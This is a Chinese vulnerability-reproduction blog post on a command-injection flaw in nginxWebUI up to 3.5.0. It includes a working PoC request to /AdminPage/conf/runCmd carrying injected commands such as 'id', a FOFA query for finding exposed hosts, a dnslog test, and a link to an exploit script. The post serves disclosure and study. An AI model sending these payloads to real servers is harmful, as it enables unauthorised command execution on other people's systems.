本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
1.漏洞描述
nginxWebUI
是一款图形化管理nginx
配置的工具, 可以使用网页来快速配置nginx
的各项功能, 包括http
协议转发,tcp
协议转发, 反向代理, 负载均衡, 静态html
服务器, ssl
证书自动申请、续签、配置等, 配置好后可一建生成nginx.conf
文件, 同时可控制nginx
使用此文件进行启动与重载, 完成对nginx
的图形化控制闭环.
参考自官方网站:https://www.nginxwebui.cn/
nginxWebUI
由于未对用户的输入进行严格过滤,导致任意命令执行漏洞。
该漏洞利用条件简单,漏洞危害较高。
影响版本:nginxWebUI <= 3.5.0
2.漏洞复现
poc
:
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
fofa
规则:app="nginxWebUI"
在这里以dnslog
平台来进行测试:
http://www.dnslog.cn/
直接输入刚刚的poc
测试:
此时证明漏洞存在,测试下能否执行命令回显:
在这里使用id
命令:
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
4.exp
相关脚本已上传至github
:
https://github.com/crow821/crowsec
你也可以在乌鸦安全公众号后台回复关键字:nginx 下载
单个脚本可以一直执行命令:
在这里注意我前面有一个运行失败的标志:
在这里主要是考虑如果遇到英文环境,在这里可能会变化掉,所以我对此做了保留:
主要是为了适配一些非UTF-8
的环境,如果你有强迫症的话,你可以将这句话修改下:
res = re.findall('
运行失败
(.*?)
nginx
"}', result)
感觉影响其实不大。
征集原创技术文章中,欢迎投递
投稿邮箱:edu@antvsion.com
文章类型:
黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。
更多详情,点我查看!